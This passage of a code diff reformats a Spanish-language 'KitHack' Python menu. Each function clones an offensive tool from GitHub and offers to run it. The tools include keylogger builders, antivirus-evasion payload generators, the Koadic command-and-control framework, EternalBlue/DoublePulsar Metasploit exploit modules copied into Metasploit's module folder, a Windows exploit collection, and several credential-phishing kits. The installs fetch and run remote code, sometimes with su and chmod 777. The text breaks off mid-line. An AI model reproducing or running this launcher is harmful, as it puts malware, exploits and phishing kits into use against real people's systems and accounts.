+ if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd sAINT && java -jar sAINT.jar") + def BeeLogger(): - if not os.path.isdir('tools/Windows/BeeLogger'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Windows && git clone https://github.com/4w4k3/BeeLogger.git && cd BeeLogger && su && chmod +x install.sh && bash install.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/BeeLogger".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd BeeLogger && python bee.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd BeeLogger && python bee.py') + if not os.path.isdir("tools/Windows/BeeLogger"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Windows && git clone https://github.com/4w4k3/BeeLogger.git && cd BeeLogger && su && chmod +x install.sh && bash install.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/BeeLogger" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd BeeLogger && python bee.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd BeeLogger && python bee.py") + def FakeImageExploiter(): - if not os.path.isdir('tools/Windows/FakeImageExploiter'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Windows && git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git && cd FakeImageExploiter && chmod +x *.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/FakeImageExploiter".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd FakeImageExploiter && bash FakeImageExploiter.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd FakeImageExploiter && bash FakeImageExploiter.sh') + if not os.path.isdir("tools/Windows/FakeImageExploiter"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Windows && git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git && cd FakeImageExploiter && chmod +x *.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/FakeImageExploiter" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd FakeImageExploiter && bash FakeImageExploiter.sh" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd FakeImageExploiter && bash FakeImageExploiter.sh" + ) + def Koadic(): - if not os.path.isdir('tools/Windows/koadic'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Windows && git clone https://github.com/zerosum0x0/koadic.git && cd koadic && pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/koadic".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd koadic && python koadic.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd koadic && python koadic.py') + if not os.path.isdir("tools/Windows/koadic"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Windows && git clone https://github.com/zerosum0x0/koadic.git && cd koadic && pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/koadic" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd koadic && python koadic.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd koadic && python koadic.py") + def PhantomEvasion(): - if not os.path.isdir('tools/Windows/Phantom-Evasion'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Windows && git clone https://github.com/oddcod3/Phantom-Evasion.git && cd Phantom-Evasion && chmod +x phantom-evasion.py') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/Phantom-Evasion".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd Phantom-Evasion && python phantom-evasion.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd Phantom-Evasion && python phantom-evasion.py') + if not os.path.isdir("tools/Windows/Phantom-Evasion"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Windows && git clone https://github.com/oddcod3/Phantom-Evasion.git && cd Phantom-Evasion && chmod +x phantom-evasion.py" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/Phantom-Evasion" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd Phantom-Evasion && python phantom-evasion.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd Phantom-Evasion && python phantom-evasion.py" + ) + def Ps1encode(): - if not os.path.isdir('tools/Windows/ps1encode'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Windows && git clone https://github.com/CroweCybersecurity/ps1encode.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/ps1encode".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd ps1encode && ruby ps1encode.rb') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd ps1encode && ruby ps1encode.rb') + if not os.path.isdir("tools/Windows/ps1encode"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Windows && git clone https://github.com/CroweCybersecurity/ps1encode.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/ps1encode" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd ps1encode && ruby ps1encode.rb") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd ps1encode && ruby ps1encode.rb") + def DKMC(): - if not os.path.isdir('tools/Windows/DKMC'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Windows && git clone https://github.com/Mr-Un1k0d3r/DKMC.git && cd DKMC && mkdir output') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/DKMC".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd DKMC && python dkmc.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd DKMC && python dkmc.py') + if not os.path.isdir("tools/Windows/DKMC"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Windows && git clone https://github.com/Mr-Un1k0d3r/DKMC.git && cd DKMC && mkdir output" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/DKMC" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Windows && cd DKMC && python dkmc.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Windows && cd DKMC && python dkmc.py") + def Cromos(): - if not os.path.isdir('tools/Windows/cromos'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Windows && git clone https://github.com/6IX7ine/cromos.git && chmod -R 777 cromos/ && cd cromos && python setup.py') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/cromos".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd cromos && python cromos.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd cromos && python cromos.py') + if not os.path.isdir("tools/Windows/cromos"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Windows && git clone https://github.com/6IX7ine/cromos.git && chmod -R 777 cromos/ && cd cromos && python setup.py" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/cromos" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd cromos && python cromos.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd cromos && python cromos.py") + def EternalScanner(): - if not os.path.isdir('tools/Windows/eternal_scanner'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Windows && git clone https://github.com/peterpt/eternal_scanner.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/eternal_scanner".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd eternal_scanner && bash escan') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd eternal_scanner && bash escan') + if not os.path.isdir("tools/Windows/eternal_scanner"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Windows && git clone https://github.com/peterpt/eternal_scanner.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/eternal_scanner" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd eternal_scanner && bash escan") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd eternal_scanner && bash escan") + def EternalblueDoublepulsarMetasploit(): - if not os.path.isdir('tools/Windows/Eternalblue-Doublepulsar-Metasploit'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Windows && git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git && cd Eternalblue-Doublepulsar-Metasploit && cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/') - print("\n{0}[✔] Done.{1}\nModulo guardado en /usr/share/metasploit-framework/modules/exploits/windows/smb/".format(GREEN, DEFAULT)) - pause("\n{}Presione una tecla para continuar...".format(GREEN)) - os.system('clear') - main() - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() + if not os.path.isdir("tools/Windows/Eternalblue-Doublepulsar-Metasploit"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Windows && git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git && cd Eternalblue-Doublepulsar-Metasploit && cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/" + ) + print( + "\n{0}[✔] Done.{1}\nModulo guardado en /usr/share/metasploit-framework/modules/exploits/windows/smb/" + .format(GREEN, DEFAULT)) + pause("\n{}Presione una tecla para continuar...".format(GREEN)) + os.system("clear") + main() + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + os.system("clear") + main() + def MS17010EternalBlueWinXPWin10(): - if not os.path.isdir('tools/Windows/MS17-010-EternalBlue-WinXP-Win10'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Windows && git clone https://github.com/hanshaze/MS17-010-EternalBlue-WinXP-Win10.git && cd MS17-010-EternalBlue-WinXP-Win10 && cp ms17_010_eternalblue_winXP-win10.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/') - print("\n{0}[✔] Done.{1}\nModulo guardado en /usr/share/metasploit-framework/modules/exploits/windows/smb/".format(GREEN, DEFAULT)) - pause("\n{}Presione una tecla para continuar...".format(GREEN)) - os.system('clear') - main() - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() + if not os.path.isdir("tools/Windows/MS17-010-EternalBlue-WinXP-Win10"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Windows && git clone https://github.com/hanshaze/MS17-010-EternalBlue-WinXP-Win10.git && cd MS17-010-EternalBlue-WinXP-Win10 && cp ms17_010_eternalblue_winXP-win10.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/" + ) + print( + "\n{0}[✔] Done.{1}\nModulo guardado en /usr/share/metasploit-framework/modules/exploits/windows/smb/" + .format(GREEN, DEFAULT)) + pause("\n{}Presione una tecla para continuar...".format(GREEN)) + os.system("clear") + main() + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + os.system("clear") + main() + def WindowsExploits(): - if not os.path.isdir('tools/Windows/Exploits'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Windows && git clone https://github.com/WindowsExploits/Exploits.git') - print("\n{0}[✔] Done.{1}\nExploits guardados en {2}/tools/Windows/Exploits".format(GREEN, DEFAULT, location)) - pause("\n{}Presione una tecla para continuar...".format(GREEN)) - os.system('clear') - main() - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - -#Tools Phishing + if not os.path.isdir("tools/Windows/Exploits"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Windows && git clone https://github.com/WindowsExploits/Exploits.git" + ) + print( + "\n{0}[✔] Done.{1}\nExploits guardados en {2}/tools/Windows/Exploits" + .format(GREEN, DEFAULT, location)) + pause("\n{}Presione una tecla para continuar...".format(GREEN)) + os.system("clear") + main() + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + os.system("clear") + main() + + +# Tools Phishing + + def HiddenEye(): - if not os.path.isdir('tools/Phishing/HiddenEye'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Phishing && git clone https://github.com/AdrMXR/HiddenEye.git && apt install python3-pip && cd HiddenEye && pip3 install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/HiddenEye".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd HiddenEye && python3 HiddenEye.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd HiddenEye && python3 HiddenEye.py') + if not os.path.isdir("tools/Phishing/HiddenEye"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Phishing && git clone https://github.com/AdrMXR/HiddenEye.git && apt install python3-pip && cd HiddenEye && pip3 install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/HiddenEye" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd HiddenEye && python3 HiddenEye.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd HiddenEye && python3 HiddenEye.py" + ) + def PhishX(): - if not os.path.isdir('tools/Phishing/PhishX'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Phishing && git clone https://github.com/Userphish/PhishX.git && cd PhishX && chmod +x installer.sh && bash installer.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/PhishX".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd PhishX && python3 PhishX.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd PhishX && python3 PhishX.py') + if not os.path.isdir("tools/Phishing/PhishX"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Phishing && git clone https://github.com/Userphish/PhishX.git && cd PhishX && chmod +x installer.sh && bash installer.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/PhishX" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd PhishX && python3 PhishX.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd PhishX && python3 PhishX.py") + def SocialPhish(): - if not os.path.isdir('tools/Phishing/SocialPhish'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Phishing && git clone https://github.com/xHak9x/SocialPhish.git && cd SocialPhish && chmod +x socialphish.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/SocialPhish".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('clear && cd tools && cd Phishing && cd SocialPhish && bash socialphish.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('clear && cd tools && cd Phishing && cd SocialPhish && bash socialphish.sh') + if not os.path.isdir("tools/Phishing/SocialPhish"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Phishing && git clone https://github.com/xHak9x/SocialPhish.git && cd SocialPhish && chmod +x socialphish.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/SocialPhish" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "clear && cd tools && cd Phishing && cd SocialPhish && bash socialphish.sh" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "clear && cd tools && cd Phishing && cd SocialPhish && bash socialphish.sh" + ) + def SocialFish(): - if not os.path.isdir('tools/Phishing/SocialFish'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Phishing && git clone https://github.com/UndeadSec/SocialFish.git && apt-get install python3 python3-pip python3-dev -y && cd SocialFish && python3 -m pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/SocialFish".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd SocialFish && python3 SocialFish.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd SocialFish && python3 SocialFish.py') + if not os.path.isdir("tools/Phishing/SocialFish"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Phishing && git clone https://github.com/UndeadSec/SocialFish.git && apt-get install python3 python3-pip python3-dev -y && cd SocialFish && python3 -m pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/SocialFish" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd SocialFish && python3 SocialFish.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd SocialFish && python3 SocialFish.py" + ) + def PhisherMan(): - if not os.path.isdir('tools/Phishing/Phisher-man'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Phishing && git clone https://github.com/FDX100/Phisher-man.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/Phisher-man".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd Phisher-man && python phisherman.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd Phisher-man && python phisherman.py') + if not os.path.isdir("tools/Phishing/Phisher-man"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Phishing && git clone 